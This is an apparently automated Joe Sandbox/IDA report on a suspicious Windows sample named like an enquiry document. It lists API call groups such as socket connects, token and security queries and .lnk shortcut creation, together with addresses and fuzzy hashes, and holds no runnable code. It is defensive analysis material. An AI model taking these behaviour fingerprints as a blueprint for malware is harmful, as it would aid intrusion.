                                • API ID: Window$Long$MetricsSystem
                                • String ID:
                                • API String ID: 2294984445-0
                                • Opcode ID: 70d915ef370679650a278d2fd72e0aacad2c021c7b9453cf0f6fcd8618557f65
                                • Instruction ID: c34353ebe8f4a606f5b23c0914a017a8aac100d37016432c04886b7c9f3d2d5b
                                • Opcode Fuzzy Hash: 70d915ef370679650a278d2fd72e0aacad2c021c7b9453cf0f6fcd8618557f65
                                • Instruction Fuzzy Hash: 4E21BD75A00256AFCB205F79DC88F6A77A4FB65365B104739F937CA2E0D370A911CBA0
                                APIs
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C9CA86
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C9CAB8
                                • __itow.LIBCMT ref: 00C9CAD0
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C9CAF6
                                • __itow.LIBCMT ref: 00C9CB07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$__itow$_memmove
                                • String ID:
                                • API String ID: 2983881199-0
                                • Opcode ID: a2a08086b36f6bbca67860263783e8e544d372d68abdf34238ca14b1698833f8
                                • Instruction ID: 7e9c65e53c181c18745815008fc5e5cf1a22e6b48c61598d8619661cb3447aeb
                                • Opcode Fuzzy Hash: a2a08086b36f6bbca67860263783e8e544d372d68abdf34238ca14b1698833f8
                                • Instruction Fuzzy Hash: 3021F332700208BBDF24EAA58CCFFDE7AA9AF49710F000024F916E7181DA718E05A7A1
                                APIs
                                  • Part of subcall function 00C63B1E: _wcsncpy.LIBCMT ref: 00C63B32
                                • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CA6DBA
                                • GetLastError.KERNEL32 ref: 00CA6DC5
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA6DD9
                                • _wcsrchr.LIBCMT ref: 00CA6DFB
                                  • Part of subcall function 00CA6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA6E31
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                • String ID:
                                • API String ID: 3633006590-0
                                • Opcode ID: 6b3f2f2a7895ef9aa70acb21da6b19f9e1a38c59ef87457a9fbd4c80294a1e0a
                                • Instruction ID: 6b48605517051a7609ecdc4c4569348ce9ff4251a87619c458374d342206e2fa
                                • Opcode Fuzzy Hash: 6b3f2f2a7895ef9aa70acb21da6b19f9e1a38c59ef87457a9fbd4c80294a1e0a
                                • Instruction Fuzzy Hash: BB21A265A013169ADB207774EC8EBEE33ACCF03768F280555E531C70D2EB61CE84AA54
                                APIs
                                  • Part of subcall function 00CBACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00CBACF5
                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB9160
                                • WSAGetLastError.WSOCK32(00000000), ref: 00CB916F
                                • connect.WSOCK32(00000000,?,00000010), ref: 00CB918B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLastconnectinet_addrsocket
                                • String ID:
                                • API String ID: 3701255441-0
                                • Opcode ID: be8960be92865f4a92aed380fb1292fe686015bc26ed1132011300e9575a581e
                                • Instruction ID: f982f757e3a47b20953d1815aaa837a2a4516c7c749060576b9395b09025424f
                                • Opcode Fuzzy Hash: be8960be92865f4a92aed380fb1292fe686015bc26ed1132011300e9575a581e
                                • Instruction Fuzzy Hash: F22190312002119FDB00AF68CC89BAE77A9EF49724F048419FA57AB395CA70EC019B51
                                APIs
                                • IsWindow.USER32(00000000), ref: 00CB89CE
                                • GetForegroundWindow.USER32 ref: 00CB89E5
                                • GetDC.USER32(00000000), ref: 00CB8A21
                                • GetPixel.GDI32(00000000,?,00000003), ref: 00CB8A2D
                                • ReleaseDC.USER32(00000000,00000003), ref: 00CB8A68
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$ForegroundPixelRelease
                                • String ID:
                                • API String ID: 4156661090-0
                                • Opcode ID: bbba1e2890ff3cc5aba18ddcf274025ab6c72d41dbc1e606b10be681a7841baf
                                • Instruction ID: 3faad3e8442f15280137b8dc3b144ff78310c2d176166b6672516c79137a3e24
                                • Opcode Fuzzy Hash: bbba1e2890ff3cc5aba18ddcf274025ab6c72d41dbc1e606b10be681a7841baf
                                • Instruction Fuzzy Hash: 73214F75A00204AFDB10EF65CC85BAA7BF9EF48305F048479F94A9B351DA70AD44DB60
                                APIs
                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C7B5EB
                                • SelectObject.GDI32(?,00000000), ref: 00C7B5FA
                                • BeginPath.GDI32(?), ref: 00C7B611
                                • SelectObject.GDI32(?,00000000), ref: 00C7B63B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: f888227421b17deee5be99adc1bb451976da57cd724d0bb8ef2a1a6fa44c06e1
                                • Instruction ID: 298025e22a7c51711ae03195b40ca350efb3229ae6cc2f3d702784d804947d3d
                                • Opcode Fuzzy Hash: f888227421b17deee5be99adc1bb451976da57cd724d0bb8ef2a1a6fa44c06e1
                                • Instruction Fuzzy Hash: 16217174800348BFDB249F25DC8479DBBE8FB30325F14C22AF529962A0D3714E928B60
                                APIs
                                • __calloc_crt.LIBCMT ref: 00C82E81
                                • CreateThread.KERNEL32(?,?,00C82FB7,00000000,?,?), ref: 00C82EC5
                                • GetLastError.KERNEL32 ref: 00C82ECF
                                • _free.LIBCMT ref: 00C82ED8
                                • __dosmaperr.LIBCMT ref: 00C82EE3
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                • String ID:
                                • API String ID: 2664167353-0
                                • Opcode ID: 8e14990fef0db9f114fe5f26e7456edd94a08133a6b859554634b7d97e750382
                                • Instruction ID: 2391eebb1957f887b7fc7bf1def327f4b33c77fa0bdaba529de9c9f81cc49500
                                • Opcode Fuzzy Hash: 8e14990fef0db9f114fe5f26e7456edd94a08133a6b859554634b7d97e750382
                                • Instruction Fuzzy Hash: AF112633104706AFDB20BFA5DC45EAB7BA8EF05778B100129FA24C6192EF31D800976C
                                APIs
                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C9B903
                                • GetLastError.KERNEL32(?,00C9B3CB,?,?,?), ref: 00C9B90D
                                • GetProcessHeap.KERNEL32(00000008,?,?,00C9B3CB,?,?,?), ref: 00C9B91C
                                • HeapAlloc.KERNEL32(00000000,?,00C9B3CB,?,?,?), ref: 00C9B923
                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C9B93A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 842720411-0
                                • Opcode ID: 465a98be6af86eeaaf074312f3a8b2acbf5dae9949dd8933d4152c8536e0484a
                                • Instruction ID: bdd0f46418997387b740265995f442bab4db4dc95e73a8ec9565e5c7786dc3d7
                                • Opcode Fuzzy Hash: 465a98be6af86eeaaf074312f3a8b2acbf5dae9949dd8933d4152c8536e0484a
                                • Instruction Fuzzy Hash: 88016971211258BFDF114FA5EC88F6B7BBEEF8A764B100429F956CA260DB718D40DA60
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA8371
                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CA837F
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CA8387
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00CA8391
                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00CA83CD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                • String ID:
                                • API String ID: 2833360925-0
                                • Opcode ID: 0b8f5b616fbb749f2e8789f3d712971b524710ca41ea21b82aea4a82c86f7d9b
                                • Instruction ID: f3337b721155ea4c031470143bbd8d50ddf8347be5b09a7199cb1bf548185c92
                                • Opcode Fuzzy Hash: 0b8f5b616fbb749f2e8789f3d712971b524710ca41ea21b82aea4a82c86f7d9b
                                • Instruction Fuzzy Hash: 9B012D75D0161ADBDF00AFA5ED88BEEBB78FB09B15F000455E542B2160DF709658C7A1
                                APIs
                                • CLSIDFromProgID.OLE32 ref: 00C9A874
                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00C9A88F
                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00C9A89D
                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C9A8AD
                                • CLSIDFromString.OLE32(?,?), ref: 00C9A8B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                • String ID:
                                • API String ID: 3897988419-0
                                • Opcode ID: 491b190c40581cfa53d2fff137bc390c11c339fbfa4b9cdfa18a2c6e0ff7c54f
                                • Instruction ID: da599f00e8cc28d6ecba282bdc4b088e68db6f96fbf6f4a12437648f834e203d
                                • Opcode Fuzzy Hash: 491b190c40581cfa53d2fff137bc390c11c339fbfa4b9cdfa18a2c6e0ff7c54f
                                • Instruction Fuzzy Hash: EB014B76600214BFEF215F68DC88BAEBBBDEF44791F144024B902DA2A0D771DE419BE1
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C9B806
                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B810
                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B81F
                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B826
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C9B83C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: c9f4771b1607873d6933ce44134d7d8c1615aa888fdbe674d243d8f00e15d4f7
                                • Instruction ID: 42c25b73c4dca8e4bb27107420372204d1584bdffccc6816622a905566860f85
                                • Opcode Fuzzy Hash: c9f4771b1607873d6933ce44134d7d8c1615aa888fdbe674d243d8f00e15d4f7
                                • Instruction Fuzzy Hash: D9F03775200344BFEB211FA5ECCCB6B7B6DFF4A764B000429F952CA1A0CB619E418A60
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C9B7A5
                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C9B7AF
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C9B7BE
                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C9B7C5
                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9B7DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: 999ae56f11cd637bede7109201b009452490f45cea2b87792ae4bbe8cc8086ea
                                • Instruction ID: 1d976370b3a2bd4cb65d0768bd301dc1acd0417854a01c1c241f4286fdf63183
                                • Opcode Fuzzy Hash: 999ae56f11cd637bede7109201b009452490f45cea2b87792ae4bbe8cc8086ea
                                • Instruction Fuzzy Hash: 9FF03771240344BFEB101FA5ACC9F6B3BACFF8A765B10412AFA52CA160DB619D418A70
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00C9FA8F
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C9FAA6
                                • MessageBeep.USER32(00000000), ref: 00C9FABE
                                • KillTimer.USER32(?,0000040A), ref: 00C9FADA
                                • EndDialog.USER32(?,00000001), ref: 00C9FAF4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                • String ID:
                                • API String ID: 3741023627-0
                                • Opcode ID: f10983179efbd1437b642648548af66683f779c5ef639a7040f58b9f28c8e48b
                                • Instruction ID: c09446ca976e305f660d26e77e38a8a2ee66e1c95a9964f38ae3f326af2cae31
                                • Opcode Fuzzy Hash: f10983179efbd1437b642648548af66683f779c5ef639a7040f58b9f28c8e48b
                                • Instruction Fuzzy Hash: 36018170500745AFEF309B20DD8EB9A77B8BB00B09F04066DB597A90E0DFF1AA559A51
                                APIs
                                • EndPath.GDI32(?), ref: 00C7B526
                                • StrokeAndFillPath.GDI32(?,?,00CDF583,00000000,?), ref: 00C7B542
                                • SelectObject.GDI32(?,00000000), ref: 00C7B555
                                • DeleteObject.GDI32 ref: 00C7B568
                                • StrokePath.GDI32(?), ref: 00C7B583
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                • String ID:
                                • API String ID: 2625713937-0
                                • Opcode ID: 943f19600bf1dda83a1e30ff35bcce15ceb34400e2559eabc18833a2ff2173e5
                                • Instruction ID: 10220f7a44e3488a5fc55f792fc8e3e0f580f15ab7122a72fef754070417580a
                                • Opcode Fuzzy Hash: 943f19600bf1dda83a1e30ff35bcce15ceb34400e2559eabc18833a2ff2173e5
                                • Instruction Fuzzy Hash: 88F0EC34000348EFDB699F25ED8C7587FE5B721322F18C215E5AA882F0C7318A96DF20
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 00CAFAB2
                                • CoCreateInstance.OLE32(00CEDA7C,00000000,00000001,00CED8EC,?), ref: 00CAFACA
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • CoUninitialize.OLE32 ref: 00CAFD2D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                • String ID: .lnk
                                • API String ID: 2683427295-24824748
                                • Opcode ID: def822903c1aebda73cb64c9d6bf5120dedc7d8d79562f5637bd5a16a757efd0
                                • Instruction ID: 3341686055c4923a8110a08cfbcdfd2813e107a854dbd7d30685ca58f395abb2
                                • Opcode Fuzzy Hash: def822903c1aebda73cb64c9d6bf5120dedc7d8d79562f5637bd5a16a757efd0
                                • Instruction Fuzzy Hash: 3EA13E71504205AFC300EFA4CC91EABB7EDEF98704F50891DB195971A2EB70EA09DB92
                                APIs
                                  • Part of subcall function 00CA78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00CA78CB
                                • CoInitialize.OLE32(00000000), ref: 00CAF04D
                                • CoCreateInstance.OLE32(00CEDA7C,00000000,00000001,00CED8EC,?), ref: 00CAF066
                                • CoUninitialize.OLE32 ref: 00CAF083
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                • String ID: .lnk
                                • API String ID: 2126378814-24824748
                                • Opcode ID: 3812da98384d059d00070b231672b1dc6e550010ad969d46714b795521108705
                                • Instruction ID: b2a3efe15ba9049e02a52e9efe48dead8ca3efbbc8634b69e4c1e78f822216c3
                                • Opcode Fuzzy Hash: 3812da98384d059d00070b231672b1dc6e550010ad969d46714b795521108705
                                • Instruction Fuzzy Hash: 5BA147756043029FC710DF54C884E6AB7E5BF89324F14855CF99AAB3A1CB31ED46CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID:
                                • String ID: #$+
                                • API String ID: 0-2552117581
                                • Opcode ID: 467a435739b76f54633bf410f12c67ea975f5b9baff550d54ea37741e15d84fb
                                • Instruction ID: dab195973191bf6138158f25484be0fb43dff18be75804d13a2dc9162e133581
                                • Opcode Fuzzy Hash: 467a435739b76f54633bf410f12c67ea975f5b9baff550d54ea37741e15d84fb
                                • Instruction Fuzzy Hash: 865123751042569FDF19EF68C485AFA7BB4EF1A310F248056FAA29B3A0D734DE42C720
                                APIs
                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00CFDC40,?,0000000F,0000000C,00000016,00CFDC40,?), ref: 00CA507B
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                  • Part of subcall function 00C6B8A7: _memmove.LIBCMT ref: 00C6B8FB
                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00CA50FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
